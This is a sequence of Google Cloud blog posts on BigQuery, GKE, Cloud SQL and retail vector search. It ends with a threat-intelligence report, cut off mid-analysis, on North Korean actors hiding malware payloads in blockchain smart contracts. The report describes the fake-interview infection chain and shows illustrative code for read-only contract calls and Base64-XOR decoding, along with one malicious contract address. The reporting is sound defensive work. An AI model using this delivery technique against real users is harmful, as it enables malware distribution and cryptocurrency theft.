We designed BigQuery Studio to give data analysts, data engineers, and data scientists a comprehensive analytics experience within a single, purpose-built platform, helping them transform data into powerful insights.
Today, we’re thrilled to unveil a significant update to BigQuery Studio, with a simplified and organized console interface to streamline your workflows, enhance your productivity, and give you greater control. Start your day ready to dive into data in an environment built for efficiency, free from time-consuming sifting through countless queries or searching for the right tables. Come with us on a tour of the new interface, including a new:
Additional Explorer view to simplify data discovery and exploration
Reference panel that brings all the context you need, without context switching
Decluttered UI that gives you more control
Finding your way with the Explorer
Your journey begins with an expanded view of the Explorer, which lets you find and access resources using a full tab with more information about each resource. To view resources within a project, pick the project in the Explorer and choose the resource type you want to explore. A list of the resources shows up in a tab where you can filter or drill down to find what you’re looking for. To see all of your starred resources across projects, simply click “Starred” at the top of the Explorer pane to open the list of starred items. Alongside the new Explorer view, the full resource tree view is still available in the Classic Explorer, accessible by clicking the middle icon at the top of the pane.
As your projects grow, so does the need for efficient searching. The new search capabilities in BigQuery Studio allow you to easily find BigQuery resources. Use the search box in the new Explorer pane to search across all of your BigQuery resources within your organization. Then, filter the results by project and resource type to pinpoint exactly what you need.
To reduce tab proliferation and give you more control over your workspace, clicking a resource now consistently opens it within the same BigQuery Studio tab. To open multiple results in separate tabs, use Ctrl+click (or Cmd+click). To keep the current tab’s content from being replaced, double-click the tab name (you’ll notice its name changes from italicized to regular font).
Context at your fingertips with the Reference panel
Writing complex queries often involves switching between tabs or running exploratory queries just to remember schema details or column names. The Reference panel eliminates this hassle. It dynamically displays context-aware information about tables and schemas directly within your editors as you write code. This means you have quick access to crucial details, so you can write your query with fewer interruptions.
The Reference panel also lets you generate code without having to copy and paste things like table or column names. To quickly start a new SQL query on a table, click the actions menu at the top of the Reference panel and select “insert query snippet”. The query code is automatically added to your editor. You can also click any field name in the table schema to insert it into your code.
Beyond the highlights: Less clutter and more efficiency
These updates are part of a broader effort to provide you with a clean workspace over which you have more control. In addition, the new BigQuery Studio includes a dedicated Job history tab, accessible from the new Explorer pane, providing a bigger view of jobs and reducing clutter by removing the bottom panel. You can also fully collapse the Explorer panel to gain more space to focus on your code.
Ready to experience the difference? We invite you to log in to BigQuery Studio and try the new interface. Check out the Home tab in BigQuery Studio to learn more about these changes. For more details and to deepen your understanding, be sure to explore our documentation. Any feedback? Email us at bigquery-explorer-feedback@google.com.
For too long, network data analysis has felt less like a science and more like deciphering cryptic clues. To help close that gap, we’re introducing a new Mandiant Academy course from Google Cloud, designed to replace frustration with clarity and confidence.
We’ve designed the course specifically for cybersecurity professionals who need to quickly and effectively enhance network traffic analysis skills. You’ll learn to cut through the noise, identify malicious fingerprints with higher accuracy, and fortify your organization’s defenses by integrating critical cyber threat intelligence (CTI).
What you’ll learn
This track includes four courses that provide practical methods to analyze networks and operationalize CTI. Students will explore five proven methodologies for network analysis:
Packet capture (PCAP)
Network flow (netflow)
Protocol analysis
Baseline and behavioral
Historical analysis
Incorporating common tools, we demonstrate how to enrich each methodology by adding CTI, and how analytical tradecraft enhances investigations.
The first course, Decoding Network Defense, refreshes foundational CTI principles and the five core network traffic analysis methodologies.
The second course, Analyzing the Digital Battlefield, investigates PCAP, netflow, and protocol analysis before exploring how CTI enriches new evidence.
In the third course, Insights into Adversaries, students learn to translate complex human behaviors into detectable signatures.
The final course, The Defender’s Arsenal, introduces essential tools for those on the frontline, protecting their network’s perimeter.
Who should attend this course?
“Protecting the Perimeter” was developed for practitioners whose daily work is to interpret network telemetry from multiple data sources and identify anomalous behavior. This track’s format is designed for professionals who possess enough knowledge and skill to defend networks, but have limited time to continue education and enhance their abilities.
This training track is the second release from Mandiant Academy’s new approach to on-demand training, which concentrates complex security concepts into short-form courses.
Sign up today
To learn more about and register for the course, please visit the Mandiant Academy website. You can also access Mandiant Academy’s on-demand, instructor-led, and experiential training options. We hope this course proves helpful in your efforts to defend your organization against cyber threats.
Deploying LLM workloads can be complex and costly, often involving a lengthy, multi-step process. To solve this, Google Kubernetes Engine (GKE) offers Inference Quickstart.
With Inference Quickstart, you can replace months of manual trial-and-error with out-of-the-box manifests and data-driven insights. Inference Quickstart integrates with the Gemini CLI through native Model Context Protocol (MCP) support to offer tailored recommendations for your LLM workload cost and performance needs. Together, these tools empower you to analyze, select, and deploy your LLMs on GKE in a matter of minutes. Here’s how.
1. Select and serve your LLM on GKE via Gemini CLI
You can install the Gemini CLI and the gke-mcp server with the following steps:
Here are some example prompts that you can give Gemini CLI to select an LLM workload and generate the manifest needed to deploy the model to a GKE cluster:
1. What are the 3 cheapest models available on GKE Inference Quickstart? Can you provide all of the related performance data and accelerators they ran on?
2. How does this model’s performance compare when it was run on different accelerators?
3. How do I choose between these 2 models?
4. I’d like to generate a manifest for this model on this accelerator and save it to the current directory.
The video below shows an end-to-end example of how you can quickly identify and deploy your optimal LLM workload to a pre-existing GKE cluster via this Gemini CLI setup:
2. Compare cost and performance across accelerators
Choosing the right hardware for your inference workload means balancing performance and cost. The trade-off is nonlinear. To simplify this complex trade-off, Inference Quickstart provides performance and cost insights across various accelerators, all backed by Google’s benchmarks.
For example, as shown in the graph below, minimizing latency for a model like Gemma 3 4b on vLLM dramatically increases cost. This is because achieving ultra-low latency requires sacrificing the efficiency of request batching, which leaves your accelerators underutilized. Request load, model size, architecture, and workload characteristics can all impact which accelerator is optimal for your specific use case.
To make an informed decision, you can get instant, data-driven recommendations by asking Gemini CLI or using the Inference Quickstart Colab notebook.
3. Calculate cost per input/output token
When you host your own model on a platform like GKE, you are billed for accelerator time, not for each individual token. Inference Quickstart calculates cost per token using the accelerator’s hourly cost and the input/output throughput.
The following formula attributes the total accelerator cost to both input and output tokens:
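One way to write this attribution as a formula, as a sketch using notation introduced here for illustration (C for the accelerator’s hourly cost, and T_in and T_out for the input and output tokens served per hour), under the 4:1 output-to-input weighting explained below:

\text{price}_{\text{input token}} = \frac{C}{T_{\text{in}} + 4\,T_{\text{out}}}, \qquad \text{price}_{\text{output token}} = 4 \times \text{price}_{\text{input token}}

As a worked example, an accelerator costing $2 per hour that serves 600,000 input and 150,000 output tokens per hour works out to roughly $1.67 per million input tokens and $6.67 per million output tokens, with the two together accounting for the full $2 of hourly cost.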
This formula assumes an output token costs four times as much as an input token. The reason for this heuristic is that the prefill phase (processing input tokens) is a highly parallel operation, whereas the decode phase (generating output tokens) is a sequential, auto-regressive process. You can ask Gemini CLI to change this ratio for you to match your workload’s expected input/output characteristics.
The key to cost-effective LLM inference is to take a data-driven approach. By relying on benchmarks for your workloads and using metrics like cost per token, you can make informed decisions that directly impact your budget and performance.
Next steps
GKE Inference Quickstart goes beyond cost insights and Gemini CLI integration, with additional optimizations for storage, autoscaling, and observability. Run your LLM workloads today with GKE Inference Quickstart to see how it can expedite and optimize your LLM deployments on GKE.
For today’s business-critical database workloads, the bar that their infrastructure must meet has never been higher. Organizations expect systems that are performant, cost-efficient, scalable, and secure. But meeting those expectations is no small feat. Surging data volumes, increasingly complex workloads, and new demands from advanced analytics and vector search for generative AI are intensifying the pressure on database performance. These trends necessitate greater computing power for running high-performance database workloads.
We continue to bring new innovations and performance improvements to both Cloud SQL Enterprise Plus and Enterprise editions. Today, we’re excited to deliver substantial efficiency gains to your database operations with the general availability of the C4A machine series, powered by Google Axion processors, for Cloud SQL Enterprise Plus edition, and the N4 machine series for Cloud SQL Enterprise edition. The existing Cloud SQL Enterprise edition machines will now be available as the “General Purpose” machine series under Cloud SQL Enterprise edition, with no changes to features or pricing.
Cloud SQL Enterprise Plus edition running on Axion-based C4A virtual machines delivers up to 48% better price-performance than N2 machine series for transactional workloads. Additionally, Cloud SQL Enterprise edition running on N4 machines delivers up to 44% better price-performance for transactional workloads and up to 3x higher throughput performance for read-only workloads as compared to Cloud SQL general purpose machine series.
Axion-powered C4A for Cloud SQL Enterprise Plus
C4A instances bring compelling advantages to managed Google Cloud database workloads. They deliver significant price-performance advantages compared to the N2 machine series and run your critical database workloads with greater speed and lower latency. Purpose-built to handle data-intensive workloads that require real-time processing, C4A instances are well-suited for high-performance databases and demanding analytics engines. The general availability of Axion-based C4A VMs for Cloud SQL Enterprise Plus edition underscores our commitment to bringing this cutting-edge technology to a diverse range of database deployments.
Cloud SQL Enterprise Plus edition for PostgreSQL and MySQL benefits significantly from Axion-based C4A instances:
They deliver up to 2x higher throughput performance and up to 65% better price-performance versus Amazon’s Graviton4-based offerings.
They also deliver up to 48% better price-performance over N2 machines for transactional workloads.
N4 machines for Cloud SQL Enterprise
The N4 machine series is powered by fifth-generation Intel Xeon Scalable processors and supports the PostgreSQL, MySQL, and SQL Server engines for Cloud SQL Enterprise edition. Compared to the Cloud SQL general purpose machine series, N4 machines deliver up to 44% better price-performance for transactional workloads and up to 3x higher throughput performance for read-only workloads.
Amplify performance with Hyperdisk Balanced storage
To further boost performance of I/O intensive workloads, both C4A and N4 machine series support the latest generation Hyperdisk Balanced storage. This combination enables higher disk performance while simultaneously lowering disk costs.
Hyperdisk Balanced provides up to 1.6x higher IOPS and up to 2x higher throughput as compared to SSD offerings that are available for Cloud SQL Enterprise Plus and Enterprise editions. Hyperdisk Balanced for Cloud SQL also helps you optimize disk costs by letting you independently configure capacity, throughput, and IOPS to match your workload requirements.
What customers are saying
We’re proud to partner with industry leaders to bring this technology to market. Check out what our customers are saying about the performance gains and efficiency improvements they’re seeing on the new C4A machines:
“As Germany’s leading chain of general practitioner clinics, Avi Medical depends on fast, highly available data to provide seamless patient care. That’s why we moved our existing Cloud SQL servers to C4A machines, slashing our database costs by 35% and cutting user latency by 20%. This powerful optimization delivered a significantly faster experience for our healthcare professionals while driving down operational expenses.” – Patrick Palacin, Managing Director, Avi Tech GmbH
“At SpareRoom, the leading room and roommate finder, the performance and efficiency of our platform are paramount. To support our scale and enhance customer experience, we continuously seek to improve key application components. While testing Cloud SQL Enterprise Plus edition running on C4A Axion machines, we saw 10% to 50% faster response times and a 40% to 150% increase in maximum throughput for multi-threaded workloads compared to our current Cloud SQL instances. Cloud SQL C4A also provides the granular control we need over storage performance, enabling us to align it perfectly with the requirements of our diverse workloads. With similar per-core and per-memory costs, the performance boost clearly makes C4A a better value for us.” – Dimitrios Kechagias, Principal Developer, Cloud Infrastructure Optimisation Lead, SpareRoom
“Synspective designs, builds, and operates a fleet of [Synthetic Aperture Radar] satellites to detect and understand changes across the globe. Our services help organizations derive critical insights from large volumes of data. We rely on Cloud SQL’s high performance databases to deliver our services worldwide. Our evaluation of Cloud SQL C4A Axion machines for our workload showed a 50% improvement in query-execution performance and a nearly 50% reduction in CPU utilization compared to our existing Cloud SQL instances. We are thrilled with these results, which give us the performance and efficiency we need to continue innovating on Google Cloud.” – Masaya Arai, Principal Cloud Architect, Synspective Inc.
Ready to get started? Visit the Google Cloud console and create a Cloud SQL instance with just a few clicks. New Google Cloud customers can start a free trial and receive $300 in free credits.
The retail media landscape has reached an inflection point. What started as a way for retailers to monetize their digital real estate has become the fastest-growing segment of digital advertising, with projections showing 21.9% growth in 2025 and a three-year compound annual growth rate of 19.7% through 2027, according to Dentsu’s Global Ad Spend Forecasts Report, December 2024. Yet, many retailers find themselves caught in a frustrating paradox: they possess rich first-party data but lack the infrastructure to monetize it effectively at scale.
Legacy advertising stacks, fragmented infrastructure, and limited machine learning capabilities prevent them from competing with established leaders like Amazon and Walmart. To build profitable, performant on-site advertising businesses, retailers need real-time personalization and measurable ROI – capabilities that require sophisticated AI infrastructure most don’t have in-house.
This is where the partnership between Moloco and Google Cloud delivers significant value. Moloco is an AI-native retail media platform, built from the ground up to deliver one-to-one ad personalization in real-time. Leveraging Google Cloud’s advanced infrastructure, the platform uses TPUs (Tensor Processing Units) and GPUs (Graphics Processing Units) for training and scoring, while Vector Search operates efficiently on CPUs (Central Processing Units). This enables outcomes-based bidding at scale, without requiring retailers to build in-house AI expertise.
The results demonstrate clear value: ~10x increase in capacity, up to ~25% lower p95 latency, and 4% revenue uplift. This blog explores how the joint architecture is reshaping retail media and delivering real-world business impact.
High expectations, limited infrastructure
Retailers face mounting pressure from multiple directions. Declining margins drive the need for new revenue streams, while complex ad tech environments make monetizing first-party data more challenging. Many hit effectiveness ceilings as their advertising spend scales, unable to maintain performance without sophisticated personalization.
Meanwhile, advertisers demand closed-loop measurement and proven ROI – capabilities that require advanced infrastructure most retailers simply don’t possess.
“The sheer scale of modern retail catalogs and the expectation of instantaneous, relevant results have pushed traditional search systems to their limits,” said Farhad Kasad, an engineering manager for Vertex AI at Google Cloud. “To solve this, retailers need to think in terms of semantic understanding. Vertex AI vector search provides the foundational infrastructure to handle billions of items and queries with ultra-low latency, enabling the move from simple keyword matching to truly understanding the context behind a search and delivering hyper-personalized results.”
Addressing this infrastructure opportunity enables retailers to build sustainable, competitive retail media businesses.
Moloco Commerce Media meets Vertex AI Vector Search
Moloco offers an end-to-end, AI-native retail media platform specifically designed to address this challenge. Rather than retrofitting existing systems with AI capabilities, Moloco built its platform from the ground up to use artificial intelligence for every aspect of ad delivery and optimization.
The platform’s integration with Google Cloud’s Vertex AI vector search creates a powerful foundation for semantic ad retrieval and matching. This combination supports hyper-personalized ads and product recommendations by understanding the contextual meaning behind user queries and behaviors, not just matching keywords.
The architecture simplifies what was previously a complex, resource-intensive process. Retailers can focus on their core business while leveraging enterprise-grade, fully managed services that scale automatically with their business needs, rather than building and maintaining their own vector databases.
Simplified architecture and scalable, managed vector search dramatically improve system performance and developer experience.
How vector search improves ad performance
Vector Search represents a major shift from traditional keyword-based matching to semantic understanding. Instead of relying solely on exact text matches, Vector Search converts products, user behaviors, and search queries into mathematical representations (vectors) that capture meaning and context.
This approach enables several breakthrough capabilities for retail media:
Real-time relevance at scale: Vector Search can process millions of product-ad combinations in milliseconds, identifying the most contextually relevant matches based on user behavior, product attributes, and advertiser goals.
Semantic understanding: The system understands that a user searching for “running gear” might be interested in advertisements for athletic shoes, moisture-wicking shirts, or fitness trackers – even if those exact terms don’t appear in the query.
Hybrid search architecture: By combining dense vector representations (semantic meaning) with sparse keyword matching (exact terms), the platform delivers both contextual relevance and precision matching; a simple illustration of this blending appears after this list.
Production-grade performance: Using Google’s ScaNN algorithm, developed by Google Research and used in popular Google services, retailers gain access to battle-tested infrastructure without the complexity of building it themselves.
Fully managed infrastructure: Reduces operational overhead while providing enterprise-grade security, reliability, and scalability that grows with retail media program success.
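To make the hybrid idea above concrete, here is a minimal, self-contained JavaScript sketch (not Moloco’s or Vertex AI’s implementation) that blends cosine similarity over dense embeddings with simple keyword overlap; the embeddings, terms, and weighting are illustrative placeholders only.

// Dense signal: cosine similarity between two embedding vectors.
function cosine(a, b) {
  let dot = 0, na = 0, nb = 0;
  for (let i = 0; i < a.length; i++) {
    dot += a[i] * b[i];
    na += a[i] * a[i];
    nb += b[i] * b[i];
  }
  return dot / (Math.sqrt(na) * Math.sqrt(nb));
}

// Sparse signal: fraction of query keywords that appear in the product's keyword set.
function keywordOverlap(queryTerms, productTerms) {
  const set = new Set(productTerms);
  const hits = queryTerms.filter(t => set.has(t)).length;
  return queryTerms.length ? hits / queryTerms.length : 0;
}

// Blend the two signals; alpha is a tunable weight chosen here purely for illustration.
function hybridScore(query, product, alpha = 0.7) {
  return alpha * cosine(query.embedding, product.embedding)
       + (1 - alpha) * keywordOverlap(query.terms, product.terms);
}

// Toy data: a query for "running gear" ranks athletic products highly even without exact matches.
const query = { embedding: [0.9, 0.1, 0.3], terms: ["running", "gear"] };
const products = [
  { name: "running shoes", embedding: [0.85, 0.2, 0.25], terms: ["running", "shoes"] },
  { name: "office chair", embedding: [0.1, 0.9, 0.4], terms: ["office", "chair"] },
];
products
  .map(p => ({ name: p.name, score: hybridScore(query, p) }))
  .sort((a, b) => b.score - a.score)
  .forEach(p => console.log(p.name, p.score.toFixed(3)));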
Imsung Choi, Staff Software Engineer at Moloco, explained: “By migrating to Google Cloud Platform’s Vertex AI vector search, we increased capacity by ~10x. Some customers even saw up to ~25% lower p95 latency.”
The operational benefits proved equally significant. As Mingtian Ni, Senior Staff Software Engineer at Moloco, noted: “The managed nature of Google Cloud Platform’s Vector Search simplified our system architecture significantly. We no longer need to manage infrastructure or optimize indexes manually; operations are more stable and scalable.”
Better together with Google Cloud
Moloco’s success stems from deep integration with Google Cloud’s AI infrastructure – specifically Vertex AI Vector Search and ScaNN. By combining Moloco’s deep learning expertise with Google’s scalable, production-grade machine learning tools, retailers can launch performant, AI-native ad businesses faster than ever.
Google Cloud provides the foundation: fast, reliable vector retrieval, managed index updates, and enterprise security. Moloco builds the application layer that transforms these capabilities into measurable business outcomes: increased monetization, reduced latency, and future-proof personalization.
Together, Moloco and Google Cloud help retailers transform first-party data into meaningful, real-time value without requiring substantial internal AI investments or custom infrastructure development. Retailers maintain full control of their first-party data, with our platform processing it strictly according to their instructions and enforcing tenant isolation to ensure security and data separation.
Moloco’s Vector Search migration and impact
In internal benchmarks and select production deployments, migration to Vertex AI Vector Search delivered measurable improvements across key performance metrics:
~10x increase in capacity, ensuring even retailers with extensive product catalogs can deliver personalized advertising experiences without performance degradation.
Up to ~25% lower p95 latency in ad serving, critical for maintaining user engagement and ad effectiveness in real-time bidding scenarios.
4.0% monetization uplift in ad revenue across several rollouts.
While results vary by catalog size and traffic, these advancements demonstrate that technical improvements translate directly to business value.
Business impact for retail leaders
For CROs and CMOs, this infrastructure delivers the revenue growth and advertiser ROI that budget approvals depend on. Improved ad relevance drives higher click-through rates and conversion, making advertising inventory more valuable to brand partners. As a result, Moloco consistently enables retailers to achieve ad revenue growth that outpaces traditional solutions by delivering a 4% uplift, making it a truly transformational force for their businesses.
Heads of retail media gain the measurable performance metrics and scalable infrastructure needed to compete with established players. Platform reliability and speed become competitive advantages rather than operational headaches.
CEOs and CFOs see long-term value from platform monetization that doesn’t require ongoing technical investment. The managed infrastructure scales with business growth while providing predictable operational costs.
Technical impact for engineering and data teams
Platform architects benefit from scalable, low-latency infrastructure that avoids custom data pipelines that are difficult to maintain. The managed service reduces technical debt while supporting business growth.
Data scientists gain access to semantically rich, machine learning-ready vector search that improves ad relevance and personalization accuracy without requiring vector database expertise.
Machine learning engineers can use pre-tuned infrastructure like ScaNN to reduce time-to-value on retrieval models, focusing on business logic rather than infrastructure optimization.
DevOps and site reliability engineers appreciate fully managed services that reduce operational overhead while ensuring high availability for revenue-critical systems.
Technical leads value easy integration with existing Google Cloud Platform tools like BigQuery, Vertex AI, and Dataflow for unified data workflows.
Security and compliance teams get end-to-end policy controls and observability across data pipelines and ad targeting logic, essential for handling sensitive customer data.
Industry trends making this a must-have
Several converging trends highlight the strategic value of AI-native retail media infrastructure:
The demise of third-party cookies increases the strategic value of first-party data, but only for retailers who can activate it effectively for advertising personalization and targeting.
Generative AI adoption accelerates the need for vector-powered search and recommendation systems. As customers become accustomed to AI-powered experiences in other contexts, they expect similar sophistication in their shopping experiences.
Rising demand for personalization, shoppable content, and ad relevance creates pressure for real-time, context-aware systems that can adapt quickly to changing user behavior and inventory conditions.
ROI-driven advertising budgets put performance pressure on every aspect of the ad stack. Advertisers demand clear attribution and measurable results, pushing retailers to invest in infrastructure that provides closed-loop measurement and optimization capabilities.
The future of retail media is AI-Native
AI-native advertising technology has evolved from competitive advantage to strategic necessity. Retailers that rely on legacy systems risk falling behind competitors who can deliver superior personalization, measurement, and scale.
The partnership between Moloco and Google Cloud demonstrates how specialized AI expertise can combine with cloud-native infrastructure to deliver capabilities that would be prohibitively expensive and complex for most retailers to build independently. The managed service model ensures that retailers can access cutting-edge AI capabilities while focusing their internal resources on customer experience and business growth.
Moloco represents the next generation of Retail Media Networks (RMN) solutions, expanding what is possible for retailers with AI-powered technology. Google Cloud is proud to partner in helping them scale a differentiated, AI-native retail media solution that delivers real business results. As the retail media landscape continues to evolve, partnerships like this will define which retailers can successfully monetize their first-party data at scale.
Get Started
Moloco’s integration with Vertex AI Vector Search is available through the Google Cloud Marketplace. Explore the capabilities of Google Cloud’s Vertex AI Vector Search.
Written by: Blas Kojusner, Robert Wallace, Joseph Dobson
Google Threat Intelligence Group (GTIG) has observed the North Korea (DPRK) threat actor UNC5342 using ‘EtherHiding’ to deliver malware and facilitate cryptocurrency theft, the first time GTIG has observed a nation-state actor adopting this method. This post is part of a two-part blog series on adversaries using EtherHiding, a technique that leverages transactions on public blockchains to store and retrieve malicious payloads—notable for its resilience against conventional takedown and blocklisting efforts. Read about the UNC5142 campaign leveraging EtherHiding to distribute malware.
Since February 2025, GTIG has tracked UNC5342 incorporating EtherHiding into an ongoing social engineering campaign, dubbed Contagious Interview by Palo Alto Networks. In this campaign, the actor uses JADESNOW malware to deploy a JavaScript variant of INVISIBLEFERRET, which has led to numerous cryptocurrency heists.
How EtherHiding Works
EtherHiding emerged in September 2023 as a key component in the financially motivated CLEARFAKE campaign (UNC5142), which uses deceptive overlays, like fake browser update prompts, to manipulate users into executing malicious code.
EtherHiding involves embedding malicious code, often in the form of JavaScript payloads, within a smart contract on a public blockchain like BNB Smart Chain or Ethereum. This approach essentially turns the blockchain into a decentralized and highly resilient command-and-control (C2) server.
The typical attack chain unfolds as follows:
Initial Compromise: DPRK threat actors typically utilize social engineering for their initial compromise (e.g., fake job interviews, crypto games, etc.). Additionally, in the CLEARFAKE campaign, the attacker first gains access to a legitimate website, commonly a WordPress site, through vulnerabilities or stolen credentials.
Injection of a Loader Script: The attacker injects a small piece of JavaScript code, often referred to as a “loader,” into the compromised website.
Fetching the Malicious Payload: When a user visits the compromised website, the loader script executes in their browser. This script then communicates with the blockchain to retrieve the main malicious payload stored on a remote server. A key aspect of this step is the use of a read-only function call (such as eth_call), which does not create a transaction on the blockchain; a minimal sketch of such a call follows this list. This ensures the retrieval of the malware is stealthy and avoids transaction fees (i.e., gas fees).
Payload Execution: Once fetched, the malicious payload is executed on the victim’s computer. This can lead to various malicious activities, such as displaying fake login pages, installing information-stealing malware, or deploying ransomware.
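To illustrate the read-only retrieval step described above, the following web3.js sketch calls a view function on a hypothetical contract. The public BNB Smart Chain endpoint matches the one seen in observed loaders, but the contract address, ABI, and function name are placeholders rather than indicators from this campaign; a .call() of this kind is served via eth_call, so it creates no on-chain transaction and costs no gas.

// Minimal sketch of a read-only (eth_call) lookup with web3.js v4+.
// The contract address and function name are illustrative placeholders.
const { Web3 } = require('web3');
const web3 = new Web3('https://bsc-dataseed.binance.org/');

const abi = [{
  "inputs": [],
  "name": "getPayload",   // hypothetical view function returning a stored string
  "outputs": [{ "internalType": "string", "name": "", "type": "string" }],
  "stateMutability": "view",
  "type": "function"
}];
const contract = new web3.eth.Contract(abi, '0x0000000000000000000000000000000000000000'); // placeholder address

async function readContractData() {
  // .call() issues an eth_call under the hood: it reads contract state
  // without creating a transaction or paying gas fees.
  const data = await contract.methods.getPayload().call();
  console.log('Returned', data.length, 'characters');
}
readContractData().catch(console.error);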
Advantages for Attackers
EtherHiding offers several significant advantages to attackers, positioning it as a particularly challenging threat to mitigate:
Decentralization and Resilience: Because malicious code is stored on a decentralized and permissionless blockchain, there is no central server that law enforcement or cybersecurity firms can take down. The malicious code remains accessible as long as the blockchain itself is operational.
Anonymity: The pseudonymous nature of blockchain transactions makes it difficult to trace the identity of the attackers who deployed the smart contract.
Immutability: Once a smart contract is deployed, the malicious code within it typically cannot be easily removed or altered by anyone other than the contract owner.
Stealth: Attackers can retrieve the malicious payload using read-only calls that do not leave a visible transaction history on the blockchain, making their activities harder to track.
Flexibility: The attacker who controls the smart contract can update the malicious payload at any time. This allows them to change their attack methods, update domains, or deploy different types of malware to compromised websites simultaneously by simply updating the smart contract.
In essence, EtherHiding represents a shift toward next-generation bulletproof hosting, where the inherent features of blockchain technology are repurposed for malicious ends. This technique underscores the continuous evolution of cyber threats as attackers adapt and leverage new technologies to their advantage.
DPRK Social Engineering Campaign
North Korea’s social engineering campaign is a sophisticated and ongoing cyber espionage and financially motivated operation that cleverly exploits the job application and interview process. This campaign targets developers, particularly in the cryptocurrency and technology sectors, to steal sensitive data, cryptocurrency, and gain persistent access to corporate networks.
The campaign has a dual purpose that aligns with North Korea’s strategic goals:
Financial Gain: A primary objective is the theft of cryptocurrency and other financial assets to generate revenue for the regime, helping it bypass international sanctions.
Espionage: By compromising developers, the campaign aims to gather valuable intelligence and potentially gain a foothold in technology companies for future operations.
The campaign is characterized by its elaborate social engineering tactics that mimic legitimate recruitment processes.
1. The Phishing Lure:
Fake Recruiters and Companies: The threat actors create convincing but fraudulent profiles on professional networking sites like LinkedIn and job boards. They often impersonate recruiters from well-known tech or cryptocurrency firms.
Fabricated Companies: In some instances, they have gone as far as setting up fake company websites and social media presences for entities like “BlockNovas LLC,” “Angeloper Agency,” and “SoftGlideLLC” to appear legitimate.
Targeted Outreach: They aggressively contact potential victims, such as software and web developers, with attractive job offers.
2. The Interview Process:
Initial Engagement: The fake recruiters engage with candidates, often moving the conversation to platforms like Telegram or Discord.
The Malicious Task: The core of the attack occurs during a technical assessment phase. Candidates are asked to perform a coding test or review a project, which requires them to download files from repositories like GitHub. These files contain malicious code.
Deceptive Tools: In other variations, candidates are invited to a video interview and are prompted with a fake error message (a technique called ClickFix) that requires them to download a supposed “fix” or specific software to proceed, which is actually the malware.
3. The Infection Chain:
The campaign employs a multi-stage malware infection process to compromise the victim’s system, often affecting Windows, macOS, and Linux systems.
Initial Downloader (e.g., JADESNOW): The malicious packages downloaded by the victim are often hosted on the npm (Node Package Manager) registry. These loaders may collect initial system information and download the next stage of malware.
Second-Stage Malware (e.g., BEAVERTAIL, JADESNOW): The JavaScript-based malware is designed to scan for and exfiltrate sensitive data, with a particular focus on cryptocurrency wallets, browser extension data, and credentials. The addition of JADESNOW to the attack chain marks UNC5342’s shift towards EtherHiding to serve up the third-stage backdoor INVISIBLEFERRET.
Third-Stage Backdoor (e.g., INVISIBLEFERRET): For high-value targets, a more persistent backdoor is deployed. INVISIBLEFERRET, a Python-based backdoor, provides the attackers with remote control over the compromised system, allowing for long-term espionage, data theft, and lateral movement within a network.
JADESNOW
JADESNOW is a JavaScript-based downloader malware family associated with the threat cluster UNC5342. JADESNOW utilizes EtherHiding to fetch, decrypt, and execute malicious payloads from smart contracts on the BNB Smart Chain and Ethereum. The input data stored in the smart contract may be Base64-encoded and XOR-encrypted. The final payload in the JADESNOW infection chain is usually a more persistent backdoor like INVISIBLEFERRET.JAVASCRIPT.
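The described encoding is straightforward for analysts to reverse once the on-chain data has been exported. The Node.js sketch below shows the generic Base64-plus-XOR pattern; the sample input and single-byte key are invented for illustration and are not taken from actual JADESNOW transactions.

// Generic decoder for data that is Base64-encoded and XOR-encrypted,
// matching the encoding pattern described above. Inputs are illustrative only.
function xorDecode(base64Input, keyBytes) {
  const raw = Buffer.from(base64Input, 'base64');        // undo the Base64 layer
  const out = Buffer.alloc(raw.length);
  for (let i = 0; i < raw.length; i++) {
    out[i] = raw[i] ^ keyBytes[i % keyBytes.length];     // repeating-key XOR
  }
  return out.toString('utf8');
}

// Made-up example: the string "hello" XORed with the single byte 0x2a, then Base64-encoded.
const sample = Buffer.from([0x68, 0x65, 0x6c, 0x6c, 0x6f].map(b => b ^ 0x2a)).toString('base64');
console.log(xorDecode(sample, Buffer.from([0x2a])));     // prints "hello"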
The deployment and management of JADESNOW differs from that of similar campaigns that implement EtherHiding, such as CLEARFAKE. The CLEARFAKE campaign, associated with the threat cluster UNC5142, functions as a malicious JavaScript framework and often masquerades as a Google Chrome browser update pop-up on compromised websites. The primary function of the embedded JavaScript is to download a payload after a user clicks the “Update Chrome” button. The second-stage payload is another Base64-encoded JavaScript stored on the BNB Smart Chain. The final payload may be bundled with other files that form part of a legitimate update, like images or configuration files, but the malware itself is usually an infostealer like LUMASTEALER.
Figure 1 presents a general overview of the social engineering attack chain. The victim receives a malicious interview question, deceiving the victim into running code that executes the initial JavaScript downloader that interacts with a malicious smart contract and downloads the second-stage payload. The smart contract hosts the JADESNOW downloader that interacts with Ethereum to fetch the third-stage payload, in this case INVISIBLEFERRET.JAVASCRIPT. The payload is run in memory and may query Ethereum for an additional credential stealer component. It is unusual to see a threat actor make use of multiple blockchains for EtherHiding activity; this may indicate operational compartmentalization between teams of North Korean cyber operators. Lastly, campaigns frequently leverage EtherHiding’s flexible nature to update the infection chain and shift payload delivery locations. In one transaction, the JADESNOW downloader can switch from fetching a payload on Ethereum to fetching it on the BNB Smart Chain. This switch not only complicates analysis but also leverages lower transaction fees offered by alternate networks.
Figure 1: UNC5342 EtherHiding on BNB Smart Chain and Ethereum
Malicious Smart Contracts
BNB Smart Chain and Ethereum are both designed to run decentralized applications (dApps) and smart contracts. A smart contract is code on a blockchain that automatically executes actions when certain conditions or agreements are met, enabling secure, transparent, and automated agreements without intermediaries. Smart contracts are compiled into bytecode and uploaded to the blockchain, making them publicly available to be disassembled for analysis.
BNB Smart Chain, like Ethereum, is a decentralized and permissionless blockchain network that supports smart contracts programmed for the Ethereum Virtual Machine (EVM). Although smart contracts offer innovative ways to build decentralized applications, their unchangeable nature is leveraged in EtherHiding to host and serve malicious code in a manner that cannot be easily blocked.
Making use of Ethereum and BNB Smart Chain for the purpose of EtherHiding is straightforward since it simply involves calling a custom smart contract on the blockchain. UNC5342’s interactions with the blockchain networks are done through centralized API service providers rather than Remote Procedure Call (RPC) endpoints, as seen with CLEARFAKE. When contacted by GTIG, responsible API service providers were quick to take action against this malicious activity; however, several other platforms have remained unresponsive. This indifference and lack of collaboration is a significant concern, as it increases the risk of this technique proliferating among threat actors.
JADESNOW On-Chain Analysis
The initial downloader queries the BNB Smart Chain through a variety of API providers, including Binplorer, to read the JADESNOW payload stored at the smart contract at address 0x8eac3198dd72f3e07108c4c7cff43108ad48a71c.
